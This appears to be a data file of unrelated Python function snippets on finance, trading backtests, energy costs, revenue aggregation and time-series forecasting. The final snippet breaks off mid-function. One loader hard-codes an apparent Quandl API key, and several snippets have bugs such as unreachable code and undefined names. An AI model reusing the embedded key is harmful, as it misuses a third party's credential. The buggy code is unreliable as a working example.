\n # removing NaN values for cryptos that have only recent data\n y = np.array(data_df[crypto], dtype=np.float64)\n y[np.isnan(y)] = 0\n \n if (crypto == \"BTC\" and same_hr):\n hr_list = []\n\n cons_list = []\n start = 0\n for end in range(len(year_ends)):\n if not same_hr:\n hr_year = np.sum(y[start:year_ends[end]])\n else:\n # use BTC hahrate for all crypto with relative efficiency\n eff = efficiencies[crypto]\n if crypto == \"BTC\":\n # compute year hr for BTC\n hr_year = np.sum(y[start:year_ends[end]])\n hr_list.append(hr_year)\n else:\n # reuse BTC year hr for other crypto\n hr_year = hr_list[end]\n\n if verbose:\n print(f\"hr: {hr_year}\")\n print(f\"eff: {eff}, crypto: {crypto}\")\n\n # compute estimated consumption\n cons_year = np.multiply(hr_year, eff*1000)\n cons_year = cons_year/(24*1000000)\n cons_year = np.divide(cons_year, 1000)\n # -----------------------------\n\n cons_list.append(cons_year)\n start = year_ends[end]\n\n hr_series = pd.Series(cons_list)\n hr_race_df[crypto] = hr_series\n #print(\"hr_list\", len(cons_list))\n \n print()\n if verbose:\n print(hr_race_df.T)\n\n hr_race_df = hr_race_df.T\n hr_race_df.to_csv(f\"data/dataset/temp_{eff}.csv\")", "def rebalance(context, data):\n logger.debug('rebalancing on: %s', algo.get_datetime())\n\n context.trend_filter = False\n\n # new_portfolio = algo.pipeline_output('pipeline').dropna(subset=['overall_rank']).sort_values('momentum', ascending=False)\n\n new_portfolio = algo.pipeline_output('pipeline').dropna(subset=['overall_rank']).sort_values('momentum', ascending=False)\n\n for equity, row in new_portfolio.iterrows():\n logger.debug('new portfolio (before filtering) - equity: %s', equity)\n\n # print(new_portfolio)\n\n # new_portfolio = new_portfolio[new_portfolio['overall_rank'].notna() & new_portfolio['momentum'] > 40][:20]\n \n # new_portfolio = new_portfolio[(new_portfolio['momentum_decile'] > 8)][:20]\n\n new_portfolio = new_portfolio.nlargest(20, ['overall_rank', 'momentum']) #<- $600K PL in 10 years\n\n # new_portfolio = new_portfolio.nlargest(20, ['momentum', 'overall_rank']) #<- 1M PL in 10 years\n\n if logger.level is logging.DEBUG:\n for equity, row in new_portfolio.iterrows():\n logger.debug('new portfolio - (after filtering) equity: %s', equity)\n \n\n # print(len(new_portfolio.index))\n\n # volatility driven weights\n # new_portfolio['inverse_volatility'] = new_portfolio['volatility'].apply(lambda x: 1 / x)\n # inv_vola_sum = new_portfolio['inverse_volatility'].sum()\n # new_portfolio['target_weight'] = new_portfolio['inverse_volatility'].apply(lambda x: x / inv_vola_sum)\n\n # portfolio size driven weights\n # num_equities = len(new_portfolio.index)\n # new_portfolio['target_weight'] = 1 / num_equities\\\n\n # logger.info('len existing portfolio: %s', len(context.portfolio.positions))\n\n if logger.level is logging.DEBUG:\n for equity, values in context.portfolio.positions.items():\n logger.debug('context.portfolio.positions - equity: %s, amount: %s, cost_basis: %s, sold_on: %s, sold_at_price: %s', equity, values.amount, values.cost_basis, values.last_sale_date, values.last_sale_price)\n\n \n order_target(algo.sid('FIBBG000NTFYM5'), 0)\n logger.debug('selling all bonds')\n\n for equity in context.portfolio.positions:\n if equity is algo.sid('FIBBG000NTFYM5'): \n continue\n if equity not in set(new_portfolio.index.tolist()):\n # logger.info('selling %s', equity)\n order_target_percent(equity, 0)\n\n stock_weights = 1.0 / max(len(context.portfolio.positions), len(new_portfolio.index))\n\n logger.debug('len existing portfolio (afer ejection): %s', len(context.portfolio.positions))\n logger.debug('len new portfolio: %s', len(new_portfolio.index))\n logger.debug('stock_weights: %s', stock_weights)\n\n # print(context.portfolio.positions.get(algo.sid('FIBBG000NTFYM5')))\n\n # spy = context.portfolio.positions.get(algo.sid('FIBBG000NTFYM5'))\n\n # if (spy is not None) and (spy.amount > 0):\n # order_target_percent(algo.sid('FIBBG000NTFYM5'), 0)\n\n for equity, row in new_portfolio.iterrows():\n if row.trend_filter is True:\n # logger.info('buying %s', equity)\n context.trend_filter = True\n order_target_percent(equity, stock_weights)\n else:\n context.trend_filter = False\n \n logger.debug('cash: %s', context.portfolio.cash)\n logger.debug('portfolio_value: %s', context.portfolio.portfolio_value)\n logger.debug('num_positions: %s', len(context.portfolio.positions))\n logger.debug('positions: %s', context.portfolio.positions)", "def calc_Cinv_boiler(Q_design_W, technology_type, boiler_cost_data):\n Capex_a_Boiler_USD = 0.0\n Opex_a_fix_Boiler_USD = 0.0\n Capex_Boiler_USD = 0.0\n\n if Q_design_W > 0.0:\n boiler_cost_data = boiler_cost_data[boiler_cost_data['code'] == technology_type]\n # if the Q_design is below the lowest capacity available for the technology, then it is replaced by the least\n # capacity for the corresponding technology from the database\n if Q_design_W < boiler_cost_data.iloc[0]['cap_min']:\n Q_design_W = boiler_cost_data.iloc[0]['cap_min']\n max_boiler_size = boiler_cost_data.iloc[0]['cap_max']\n\n if Q_design_W <= max_boiler_size:\n\n boiler_cost_data = boiler_cost_data[\n (boiler_cost_data['cap_min'] <= Q_design_W) & (boiler_cost_data['cap_max'] > Q_design_W)]\n\n Inv_a = boiler_cost_data.iloc[0]['a']\n Inv_b = boiler_cost_data.iloc[0]['b']\n Inv_c = boiler_cost_data.iloc[0]['c']\n Inv_d = boiler_cost_data.iloc[0]['d']\n Inv_e = boiler_cost_data.iloc[0]['e']\n Inv_IR = boiler_cost_data.iloc[0]['IR_%']\n Inv_LT = boiler_cost_data.iloc[0]['LT_yr']\n Inv_OM = boiler_cost_data.iloc[0]['O&M_%'] / 100.0\n\n InvC = Inv_a + Inv_b * (Q_design_W) ** Inv_c + (Inv_d + Inv_e * Q_design_W) * log(Q_design_W)\n\n Capex_a_Boiler_USD = calc_capex_annualized(InvC, Inv_IR, Inv_LT)\n Opex_a_fix_Boiler_USD = InvC * Inv_OM\n Capex_Boiler_USD = InvC\n\n else:\n number_of_boilers = int(ceil(Q_design_W / max_boiler_size))\n Q_nom_W = Q_design_W / number_of_boilers\n\n boiler_cost_data = boiler_cost_data[\n (boiler_cost_data['cap_min'] <= Q_nom_W) & (boiler_cost_data['cap_max'] > Q_nom_W)]\n\n Inv_a = boiler_cost_data.iloc[0]['a']\n Inv_b = boiler_cost_data.iloc[0]['b']\n Inv_c = boiler_cost_data.iloc[0]['c']\n Inv_d = boiler_cost_data.iloc[0]['d']\n Inv_e = boiler_cost_data.iloc[0]['e']\n Inv_IR = boiler_cost_data.iloc[0]['IR_%']\n Inv_LT = boiler_cost_data.iloc[0]['LT_yr']\n Inv_OM = boiler_cost_data.iloc[0]['O&M_%'] / 100.0\n\n InvC = (Inv_a + Inv_b * (Q_nom_W) ** Inv_c + (Inv_d + Inv_e * Q_nom_W) * log(Q_nom_W)) * number_of_boilers\n\n Capex_a_Boiler_USD = calc_capex_annualized(InvC, Inv_IR, Inv_LT)\n Opex_a_fix_Boiler_USD = InvC * Inv_OM\n Capex_Boiler_USD = InvC\n\n return Capex_a_Boiler_USD, Opex_a_fix_Boiler_USD, Capex_Boiler_USD", "def __init__(self, split: str, train_fraction=0.7):\n\n super().__init__()\n\n self.train_fraction = train_fraction\n\n split_acceptable_values = ('train', 'val')\n assert split in split_acceptable_values, f\"Acceptable values for split are: {split_acceptable_values}\"\n\n self.split = split\n\n self.coffee_df = pd.read_csv(\n resource_filename(\"data\", \"coffee-prices-historical-chart-data.csv\"), sep=\",\", header=0,\n names=['date', 'value'],\n skiprows=2687)\n self.coffee_df['value_normalized'] =\\\n Normalizer(norm='max').fit_transform(self.coffee_df['value'].values.reshape((1, -1))).ravel()\n\n\n self.sugar_df = pd.read_csv(\n resource_filename(\"data\", \"sugar-prices-historical-chart-data.csv\"), sep=\",\", header=0,\n names=['date', 'value'],\n skiprows=13)\n self.sugar_df['value_normalized'] =\\\n Normalizer(norm='max').fit_transform(self.sugar_df['value'].values.reshape((1, -1))).ravel()\n\n if len(self.coffee_df) != len(self.sugar_df) or len(self.coffee_df) == 0:\n raise ValueError(\"Both dataframes should have datapoints and the same number of datapoints as each other\")\n n_records_total = len(self.coffee_df)\n self.n_records_train = int(self.train_fraction * n_records_total)\n self.n_records_val = n_records_total - self.n_records_train\n\n self.sugar_df_train, self.sugar_df_val = self.sugar_df.iloc[:self.n_records_train, :],\\\n self.sugar_df.iloc[self.n_records_train:, :]\n\n self.coffee_df_train, self.coffee_df_val = self.coffee_df.iloc[:self.n_records_train, :],\\\n self.coffee_df.iloc[self.n_records_train:, :]\n\n self.pane_size = 4 # how many sequential tokens there are per side of neural net (#output units = #input units)\n \"\"\"\n - - - - # output (pane), sequence with x-axis being time--->\n - - - - # input (pane), sequence with x-axis being time--->\n 0 1 2 3 4 # indices for input and output above\n \"\"\"\n self.frame_size = self.pane_size + 1", "def get_prices(country, year, square=2, name='p_', store=yearly):\n\n year1 = 'y' + str(year) + '_'\n year0 = 'y' + str(year - 1) + '_'\n\n df1 = yearly[year1 + 'price_' + country]\n df0 = yearly[year0 + 'price_' + country]\n\n df1.name = 'p' + str(year)\n df0.name = 'p' + str(year - 1)\n\n gr1 = df1.groupby(axis=0, level='PRODUCT_NC')\n gr0 = df0.groupby(axis=0, level='PRODUCT_NC')\n\n l1 = []\n drops1 = []\n for product in gr1.groups.keys():\n try:\n l1.append((product, ref_dict[product]))\n except KeyError:\n drops1.append(product)\n\n l0 = []\n drops0 = []\n for product in gr0.groups.keys():\n try:\n l0.append((product, ref_dict[product]))\n except KeyError:\n drops0.append(product)\n\n return pd.DataFrame((np.log(df1) - np.log(df0) - (\n np.log(df1.ix[l1].reset_index(level='PARTNER')['p' + str(year)].reindex(df1.index, level='PRODUCT_NC')) - (\n np.log(df0.ix[l0].reset_index(level='PARTNER')['p' + str(year - 1)].reindex(df0.index, level='PRODUCT_NC'))))), columns=[name + str(year)]) ** square", "def before_trading_start(context, data):\n context.output = pipeline_output('my_pipeline')\n context.current_stock_list = context.output.index.tolist()\n #print(context.output['weekly_classifier'])\n context.daily_stat_history.append(context.output)\n if len(context.daily_stat_history) > 2: # only keep last two units\n context.daily_stat_history.pop(0)\n\n # print context.output['daily_classifier']\n sig_counts = context.output['daily_classifier'].value_counts()\n if 2.0 not in sig_counts.index:\n sig_counts[2.0] = 0.0\n if 4.0 not in sig_counts.index:\n sig_counts[4.0] = 0.0\n if 8.0 not in sig_counts.index:\n sig_counts[8.0] = 0.0\n if 10.0 not in sig_counts.index:\n sig_counts[10.0] = 0.0\n if 12.0 not in sig_counts.index:\n sig_counts[12.0] = 0.0\n if 16.0 not in sig_counts.index:\n sig_counts[16.0] = 0.0\n if 18.0 not in sig_counts.index:\n sig_counts[18.0] = 0.0\n if 20.0 not in sig_counts.index:\n sig_counts[20.0] = 0.0", "def front_column_model_p_gain():", "def sub_tax_cost_transfer_pricing(manager, df_fields, seq_recs, seq_reservas):\n # df_hotel = manager.get_dataframe(tables[\"dwc_bok_t_canco_hotel\"])\n # df_circuit = manager.get_dataframe(tables[\"dwc_bok_t_canco_hotel_circuit\"])\n # df_other = manager.get_dataframe(tables[\"dwc_bok_t_canco_other\"])\n # df_transfer = manager.get_dataframe(tables[\"dwc_bok_t_canco_transfer\"])\n # df_endow = manager.get_dataframe(tables[\"dwc_bok_t_canco_endowments\"])\n # df_extra = manager.get_dataframe(tables[\"dwc_bok_t_canco_extra\"])\n\n df_aux = df_fields.select(\"operative_incoming\", \"booking_id\", \"invoicing_company\", \"creation_date\",\n \"booking_currency\")\n\n df_hotel = sub_tax_cost_transfer_pricing_aux(manager, df_hotelt, seq_recs, seq_reservas, df_aux)\n df_circuit = sub_tax_cost_transfer_pricing_aux(manager, df_circuitt, seq_recs, seq_reservas, df_aux)\n df_other = sub_tax_cost_transfer_pricing_aux(manager, df_othert, seq_recs, seq_reservas, df_aux)\n df_transfer = sub_tax_cost_transfer_pricing_aux(manager, df_transfert, seq_recs, seq_reservas, df_aux)\n df_endow = sub_tax_cost_transfer_pricing_aux(manager, df_endowt, seq_recs, seq_reservas, df_aux)\n df_extra = sub_tax_cost_transfer_pricing_aux_extra(manager, df_extrat, seq_recs, seq_reservas, df_aux)\n\n df_impuesto_canco = df_hotel.union(df_circuit).union(df_other).union(df_transfer).union(df_endow).union(\n df_extra)\n\n df_impuesto_canco = df_impuesto_canco.groupBy(\"operative_incoming\", \"booking_id\") \\\n .agg({'impuesto_canco': 'sum'}).withColumnRenamed(\"SUM(impuesto_canco)\", \"impuesto_canco\")\n\n df_impuesto_canco = df_impuesto_canco.withColumnRenamed(\"operative_incoming\", \"seq_rec\") \\\n .withColumnRenamed(\"booking_id\", \"seq_res\")\n\n # add impuesto_canco\n df_fields = df_fields.join(df_impuesto_canco, [df_fields.operative_incoming == df_impuesto_canco.seq_rec,\n df_fields.booking_id == df_impuesto_canco.seq_res],\n 'left_outer').drop(\"seq_rec\", \"seq_res\")\n\n df_addcanco = sub_transfer_pricing_aux_add_canco(manager, df_fields, seq_recs, seq_reservas)\n\n df_addcanco = df_addcanco.withColumnRenamed(\"operative_incoming\", \"seq_rec\") \\\n .withColumnRenamed(\"booking_id\", \"seq_res\")\n\n # add add_impuesto_canco\n df_fields = df_fields.join(df_addcanco, [df_fields.operative_incoming == df_addcanco.seq_rec,\n df_fields.booking_id == df_addcanco.seq_res],\n \"left_outer\").drop(df_addcanco.seq_rec).drop(df_addcanco.seq_res)\n\n df_fields = df_fields.na.fill({'impuesto_canco': 0, 'add_impuesto_canco': 0})\n\n df_fields = df_fields.withColumn(\"Tax_Cost_Transfer_pricing\",\n df_fields.impuesto_canco + df_fields.add_impuesto_canco) \\\n .drop(\"impuesto_canco\", \"add_impuesto_canco\")\n\n df_fields = df_fields.withColumn(\"Tax_Cost_Transfer_pricing\", udf_round_ccy(df_fields.Tax_Cost_Transfer_pricing,\n df_fields.booking_currency))\n\n del df_hotel, df_circuit, df_other, df_transfer, df_endow, df_extra, df_impuesto_canco, df_addcanco, df_aux\n\n return df_fields", "def compute_increase_rate(input_data):\n rates = {}\n for comp in input_data:\n stock_prices = input_data[comp][1]\n rates[comp] = []\n for i in range(len(stock_prices)-1):\n # Add a new increase rate to the dictionary\n rates[comp].append((stock_prices[i] - stock_prices[i+1])/stock_prices[i+1])\n return rates", "def calc_cop():\n df = pp.load_csv_file('COP_in.csv', 'metrics_data') \n df = pp.clean_dataframe(df, 5)\n\n df_cop = df['LP01LM01_QQ'] / df['SJ01_SM01']\n df_cop = df_cop.replace(to_replace=np.nan, value = 0, inplace=False)\n \n return df_cop", "def sub_tax_cost_transfer_pricing_eur(manager, df_fields, seq_recs, seq_reservas):\n # df_hotel = manager.get_dataframe(tables[\"dwc_bok_t_canco_hotel\"])\n # df_circuit = manager.get_dataframe(tables[\"dwc_bok_t_canco_hotel_circuit\"])\n # df_other = manager.get_dataframe(tables[\"dwc_bok_t_canco_other\"])\n # df_transfer = manager.get_dataframe(tables[\"dwc_bok_t_canco_transfer\"])\n # df_endow = manager.get_dataframe(tables[\"dwc_bok_t_canco_endowments\"])\n # df_extra = manager.get_dataframe(tables[\"dwc_bok_t_canco_extra\"])\n\n df_aux = df_fields.select(\"operative_incoming\", \"booking_id\", \"invoicing_company\", \"creation_date\",\n \"booking_currency\")\n\n df_hotel = sub_tax_transfer_pricing_eur_aux(manager, df_hotelt, seq_recs, seq_reservas, df_aux)\n df_circuit = sub_tax_transfer_pricing_eur_aux(manager, df_circuitt, seq_recs, seq_reservas, df_aux)\n df_other = sub_tax_transfer_pricing_eur_aux(manager, df_othert, seq_recs, seq_reservas, df_aux)\n df_transfer = sub_tax_transfer_pricing_eur_aux(manager, df_transfert, seq_recs, seq_reservas, df_aux)\n df_endow = sub_tax_transfer_pricing_eur_aux(manager, df_endowt, seq_recs, seq_reservas, df_aux)\n df_extra = sub_tax_transfer_pricing_eur_aux_extra(manager, df_extrat, seq_recs, seq_reservas, df_aux)\n\n df_impuesto_canco = df_hotel.union(df_circuit).union(df_other).union(df_transfer).union(df_endow).union(\n df_extra)\n\n df_impuesto_canco = df_impuesto_canco.groupBy(\"operative_incoming\", \"booking_id\") \\\n .agg({'impuesto_canco': 'sum'}).withColumnRenamed(\"SUM(impuesto_canco)\", \"impuesto_canco\")\n\n df_impuesto_canco = df_impuesto_canco.withColumnRenamed(\"operative_incoming\", \"seq_rec\") \\\n .withColumnRenamed(\"booking_id\", \"seq_res\")\n\n df_fields = df_fields.join(df_impuesto_canco, [df_fields.operative_incoming == df_impuesto_canco.seq_rec,\n df_fields.booking_id == df_impuesto_canco.seq_res],\n 'left_outer').drop(\"seq_rec\", \"seq_res\")\n\n df_addcanco = sub_transfer_pricing_aux_add_canco(manager, df_fields, seq_recs, seq_reservas, EUR)\n\n df_addcanco = df_addcanco.withColumnRenamed(\"operative_incoming\", \"seq_rec\") \\\n .withColumnRenamed(\"booking_id\", \"seq_res\")\n\n # add add_impuesto_canco\n df_fields = df_fields.join(df_addcanco, [df_fields.operative_incoming == df_addcanco.seq_rec,\n df_fields.booking_id == df_addcanco.seq_res],\n \"left_outer\").drop(df_addcanco.seq_rec).drop(df_addcanco.seq_res)\n\n df_fields = df_fields.na.fill({'impuesto_canco': 0, 'add_impuesto_canco': 0})\n\n df_fields = df_fields.withColumn(\"Tax_Cost_Transfer_pricing_EUR\",\n df_fields.impuesto_canco + df_fields.add_impuesto_canco) \\\n .drop(\"impuesto_canco\", \"add_impuesto_canco\")\n\n del df_hotel, df_circuit, df_other, df_transfer, df_endow, df_extra, df_impuesto_canco, df_addcanco\n\n return df_fields", "def sort_and_aggregate_periods(budget_model):\n # Calculate total number of months.\n periods = budget_model[\"periods\"] \n total_number_of_months = len(periods) \n budget_model[\"total_number_of_months\"] = total_number_of_months\n\n # Get the reference to the total revenue in the budget model.\n total_revenue = budget_model[\"total_revenue\"]\n\n # Initialize variables used to calculate greatest increase in revenue.\n greatest_increase_revenue = 0\n greatest_increase_name = \"\"\n\n # Initialize variables used to calculate greatest decrease in revenue.\n greatest_decrease_revenue = 0\n greatest_decrease_name = \"\"\n\n # Retrieve sort keys for budget model and sort them into chronological order.\n period_keys = periods.keys()\n period_key_list = list(period_keys)\n period_key_list.sort()\n\n # Initialize previous revenue.\n # There is no revenue change for the first period.\n previous_revenue = periods[period_key_list[0]][\"revenue\"]\n total_revenue_change = 0\n\n # Calculate aggregations by processing periods in chronological order.\n for period_key in period_key_list:\n period = periods[period_key]\n total_revenue = total_revenue + period[\"revenue\"]\n\n budget_model[\"total_revenue\"] = total_revenue\n\n revenue = period[\"revenue\"]\n revenue_change = revenue - previous_revenue\n total_revenue_change = total_revenue_change + revenue_change\n \n if revenue_change > greatest_increase_revenue:\n greatest_increase_revenue = revenue_change\n greatest_increase_name = period[\"name\"]\n\n if revenue_change < greatest_decrease_revenue:\n greatest_decrease_revenue = revenue_change\n greatest_decrease_name = period[\"name\"]\n\n previous_revenue = revenue\n\n # Write aggregations to the budget model.\n budget_model[\"greatest_increase\"] = {\"name\": greatest_increase_name, \"revenue\": greatest_increase_revenue}\n budget_model[\"greatest_decrease\"] = {\"name\": greatest_decrease_name, \"revenue\": greatest_decrease_revenue}\n budget_model[\"average_revenue_change\"] = round(total_revenue_change / total_number_of_months, 0)", "def test_lcoe_calc_noscale():\n eqn = None\n # from pvwattsv7 defaults\n data = {'aep': 35188456.00,\n 'capital_cost': 53455000.00,\n 'foc': 360000.00,\n 'voc': 0,\n 'fcr': 0.096}\n true_lcoe = 15.62 # cents/kWh\n true_lcoe *= 10 # $/MWh\n\n eos = EconomiesOfScale(eqn, data)\n assert eos.raw_capital_cost == eos.scaled_capital_cost\n assert eos.raw_capital_cost == data['capital_cost']\n assert np.allclose(eos.raw_lcoe, true_lcoe, rtol=0.001)\n assert np.allclose(eos.scaled_lcoe, true_lcoe, rtol=0.001)\n\n eqn = 1\n eos = EconomiesOfScale(eqn, data)\n assert eos.raw_capital_cost == eos.scaled_capital_cost\n assert eos.raw_capital_cost == data['capital_cost']\n assert np.allclose(eos.raw_lcoe, true_lcoe, rtol=0.001)\n assert np.allclose(eos.scaled_lcoe, true_lcoe, rtol=0.001)\n\n aep = data.pop('aep')\n data['mean_cf'] = 0.201\n data['capacity'] = 20\n eos = EconomiesOfScale(eqn, data)\n assert np.allclose(aep, eos.aep, rtol=0.001)\n assert eos.raw_capital_cost == eos.scaled_capital_cost\n assert eos.raw_capital_cost == data['capital_cost']\n assert np.allclose(eos.raw_lcoe, true_lcoe, rtol=0.002)\n assert np.allclose(eos.scaled_lcoe, true_lcoe, rtol=0.002)", "def monthly_benefit(self):\n \"\"\"Calculate weekly benefit of this company from this day\"\"\"\n total_purchase_price = 0\n total_selling_price = 0\n last_thirty_days = timezone.now() - timedelta(days=30)\n items = self.item_set.filter(status=\"sold\", updated_at__gte=last_thirty_days)\n for item in items:\n total_purchase_price += item.price\n total_selling_price += item.selling_price\n benefit = total_selling_price - total_purchase_price\n return benefit", "def preproc_data(data):\n # Load data manually from Yahoo! finance\n\n # Initialize TP Matrix\n # 3-dimension: # of stock * 18 * 18\n # narray\n _TP_matrixs = np.zeros(\n (len(data.ix[stockname]) - 230, 18, 18), dtype=np.bool)\n old = data.ix[stockname]['close'][229]\n TP_matrixs = pd.Panel(_TP_matrixs, items=data.ix[stockname].index[230:])\n label = np.zeros((len(data.ix[stockname]) - 230), dtype=np.float)\n dataindex = 0\n dataset = []\n # Construct TP Matrix\n for TP_matrix in TP_matrixs.iteritems():\n # Extract raw close price of last 230 days\n # pdb.set_trace()\n tp_features = np.zeros((18, 18), dtype=np.bool)\n _list_CP = data.ix[stockname][data.ix[stockname].index <\n TP_matrix[0]]['close'].tolist()\n list_CP = _list_CP[len(_list_CP) - 230: len(_list_CP)]\n close = data.ix[stockname]['close'][dataindex + 230]\n label = (close - old) / old\n old = close\n # col[0, 8] for Upward TP Matrix\n # col[9, 17] for Downward TP Matrix\n for col in range(0, 18):\n D = columns[col][0] - 1\n for row in range(0, 18):\n # For each element of TP Matrix\n for TP in range(D, columns[col][1]):\n # Change ratio of stock on day D with repect to the price\n # at TP\n C_TPD = (list_CP[TP] - list_CP[D]) / list_CP[D]\n if C_TPD * 100 >= rows[row][0] and C_TPD * 100 < rows[row][1]:\n TP_matrix[1][row][col] = True\n tp_features[row][col] = True\n break\n\n sample = DataSet()\n sample.tp_features = tp_features\n sample.labels = label\n dataindex += 1\n dataset.append(sample)\n\n filename = 'data/TP_matrix_' + stockname + '.pkl'\n output = open(filename, 'wb')\n # # Pickle dictionary using protocol 0.\n pickle.dump(TP_matrixs, output)\n output.close()\n return dataset", "def trend_price_down(self):\n raise NotImplementedError()", "def leitner_proportions(df):\n denom = df.shape[0]\n prop_dict = {}\n\n for i in range(1,6):\n df_i = df[df['comfort_level'] == i]\n numer = df_i.shape[0]\n prop_dict[i] = numer / denom\n\n prop_df = pd.DataFrame.from_dict([prop_dict], orient='columns') \n\n prop_df = prop_df.T.rename(columns={0:'proportion'}) \n \n return prop_df", "def get_pred_score(file_name, kpi, start_train, end_train, periods=365):\n # set names for columns in order\n names = ['date', 'handle_time', 'handle_time_forecast',\n 'volume', 'volume_forecast']\n df = pd.read_csv('./data/'+file_name, names=names, header=1, index_col=0)\n\n df['date'] = pd.to_datetime(df['date'])\n df.index = df['date']\n\n # create column for aht\n df['aht'] = df['handle_time']/df['volume']\n df['aht_forecast'] = df['handle_time_forecast']/df['volume_forecast']\n\n # df = df[(df['aht'] > 200) & (df['aht'] < 1500)]\n\n df1 = df.copy()\n\n # create business unit name\n bu = file_name[:6]\n\n # # remove outliers if it helps the model\n # df = remove_outliers(df, bu)\n\n # remove holidays\n df = df[~df.index.isin(h.iloc[:,0].tolist())]\n\n # remove weekends\n df = df[~df.index.weekday.isin([5,6])]\n\n # # plot data in a notebook\n # plot data\n # plot_time_vol(df)\n\n # create training\n df = create_training_data(df, kpi, start_train, end_train)\n\n \n # display(df.head())\n m,future = create_forecast(df, periods=int(periods))\n forecast = m.predict(future)\n\n # # plot forecast in a notebook\n # plot_forecast(forecast)\n\n # set forecast beginning and end date\n f = forecast.copy()\n end_test = df1.index.max()\n f = f[(forecast['ds'] > end_train) & (f['ds'] <= end_test)]\n\n # create validation dataset\n df2 = df1.copy()\n df2['ds'] = pd.to_datetime(df2.index.date) \n\n # set start date of validation data equal to June 1st, 2020 or any other date\n df2 = df2[df2['ds'] > end_train]\n\n # remove weekends and holidays from data\n df2 = df2[~df2.index.isin(h.iloc[:,0].tolist())]\n df2 = df2[~df2.index.weekday.isin([5,6])]\n os.makedirs('./preds/'+kpi, exist_ok=True)\n\n future_forecast=forecast[['ds', 'yhat_lower', 'yhat', 'yhat_upper']][forecast['ds']>datetime.datetime.now()]\n\n f[['ds', 'yhat_lower', 'yhat', 'yhat_upper']].to_csv('./preds/'+kpi+'/'+bu+'.csv')\n forecast.to_csv('./preds/analysis/'+kpi+'_'+bu+'.csv')\n\n # Validate test data, it must match for scoring\n mae = evaluate_model(f,df2, kpi, metric='mae')\n\n mae.update({'kpi': kpi, 'start_train':start_train, 'end_train': end_train, 'end_test': end_test}) \n\n curr = pd.read_csv('scores/'+kpi+'_score.csv',index_col=0)\n new = pd.DataFrame(mae, index=[bu])\n\n new.to_csv('./scores/current/'+bu+'_'+kpi+'.csv')\n \n if bu not in curr.index:\n curr = pd.concat([curr, new], 0)\n # create log everytime a score is superceded\n elif new.loc[bu,'prophet'] < curr.loc[bu,'prophet']:\n data = pd.concat([curr.loc[[bu],:],new.loc[[bu],:]],0)\n data.to_csv('./scores/logs/'+bu+'_'+kpi+'_'+datetime.datetime.now()\n .strftime(\"%b %d %Y %H:%M:%S\").replace(' ', '_')+'.csv')\n curr.update(new)\n curr.to_csv('./scores/'+kpi+'_score.csv')\n\n return 'error with metric'\n print('\\ntraining',file_name, 'on', kpi, 'start train:',start_train, \n 'end train:', end_train, 'end_test:', )", "def load_data(ticker, n_steps=50, scale=True, shuffle=True, lookup_step=1, \r\n test_size=0.2, feature_columns=['open', 'high', 'low', 'close', 'adjclose', 'volume',\r\n 'adjclose_v', 'value_gas', 'value_silver', 'value_gold', 'value_usd',\r\n 'PMI', 'Production', 'New Orders', 'Backlog of Orders',\r\n 'Supplier Deliveries', 'Inventories', 'Customers Inventories',\r\n 'Employment', 'Prices', 'New Export Orders', 'Imports']):\r\n \r\n ind = []\r\n quandl.ApiConfig.api_key = 'hXxA3xSampghdgkVeSJC'\r\n pmi = pd.read_excel(\"pmi.xlsx\", index_col=0)\r\n \r\n \r\n # Cleaning, processing and transforming the gold data\r\n gold = quandl.get(\"WGC/GOLD_DAILY_USD\")\r\n gold.columns = [\"value_gold\"]\r\n \r\n gold_ind = []\r\n gold_data = []\r\n for i in range(1, len(gold.index)):\r\n if(gold.index[i-1].day != gold.index[i].day-1):\r\n for k in range(gold.index[i].day - gold.index[i-1].day):\r\n try:\r\n gold_ind.append(datetime(gold.index[i-1].year, gold.index[i-1].month, gold.index[i-1].day+k))\r\n gold_data.append(gold.value_gold[i-1])\r\n except:\r\n pass\r\n else:\r\n gold_ind.append(gold.index[i-1])\r\n gold_data.append(gold.value_gold[i-1])\r\n \r\n \r\n gold = pd.DataFrame(data = gold_data, index = gold_ind, columns = [\"value_gold\"])\r\n # Cleaning, processing and transforming the USD data \r\n gold_temp = quandl.get(\"WGC/GOLD_DAILY_USD\")\r\n gold_temp.columns = [\"value_gold\"]\r\n \r\n usd_value = quandl.get(\"FRED/TWEXB\")\r\n usd_value.columns = [\"value_usd\"]\r\n data = []\r\n for i in range(len(list(usd_value.value_usd))-1):\r\n for k in range(5):\r\n data.append(list(usd_value.value_usd)[i])\r\n data.append(list(usd_value.value_usd)[-1])\r\n new_usd = pd.DataFrame(data, index=gold_temp.index[gold_temp.index.get_loc('1995-01-04'):gold_temp.index.get_loc('2020-01-01')+1])\r\n new_usd.columns = [\"value_usd\"]\r\n \r\n new_usd_ind = []\r\n new_usd_data = []\r\n for i in range(1, len(new_usd.index)):\r\n if(new_usd.index[i-1].day != new_usd.index[i].day-1):\r\n for k in range(new_usd.index[i].day - new_usd.index[i-1].day):\r\n try:\r\n new_usd_ind.append(datetime(new_usd.index[i-1].year, new_usd.index[i-1].month, new_usd.index[i-1].day+k))\r\n new_usd_data.append(new_usd.value_usd[i-1])\r\n except:\r\n pass\r\n else:\r\n new_usd_ind.append(new_usd.index[i-1])\r\n new_usd_data.append(new_usd.value_usd[i-1])\r\n \r\n \r\n new_usd = pd.DataFrame(data = new_usd_data, index = new_usd_ind, columns = [\"value_usd\"])\r\n \r\n # Cleaning, processing and transforming the silver data\r\n silver = quandl.get(\"LBMA/SILVER\")\r\n silver.drop([\"GBP\", \"EURO\"], axis=1, inplace=True)\r\n silver.columns = [\"value_silver\"]\r\n \r\n silver_ind = []\r\n silver_data = []\r\n for i in range(1, len(silver.index)):\r\n if(silver.index[i-1].day != silver.index[i].day-1):\r\n for k in range(silver.index[i].day - silver.index[i-1].day):\r\n try:\r\n silver_ind.append(datetime(silver.index[i-1].year, silver.index[i-1].month, silver.index[i-1].day+k))\r\n silver_data.append(silver.value_silver[i-1])\r\n except:\r\n pass\r\n else:\r\n silver_ind.append(silver.index[i-1])\r\n silver_data.append(silver.value_silver[i-1])\r\n \r\n \r\n silver = pd.DataFrame(data = silver_data, index = silver_ind, columns = [\"value_silver\"])\r\n\r\n # Cleaning, processing and transforming the gas data\r\n \r\n gas = quandl.get(\"FRED/DGASUSGULF\")\r\n gas.columns = [\"value_gas\"]\r\n \r\n gas_ind = []\r\n gas_data = []\r\n for i in range(1, len(gas.index)):\r\n if(gas.index[i-1].day != gas.index[i].day-1):\r\n for k in range(gas.index[i].day - gas.index[i-1].day):\r\n try:\r\n gas_ind.append(datetime(gas.index[i-1].year, gas.index[i-1].month, gas.index[i-1].day+k))\r\n gas_data.append(gas.value_gas[i-1])\r\n except:\r\n pass\r\n else:\r\n gas_ind.append(gas.index[i-1])\r\n 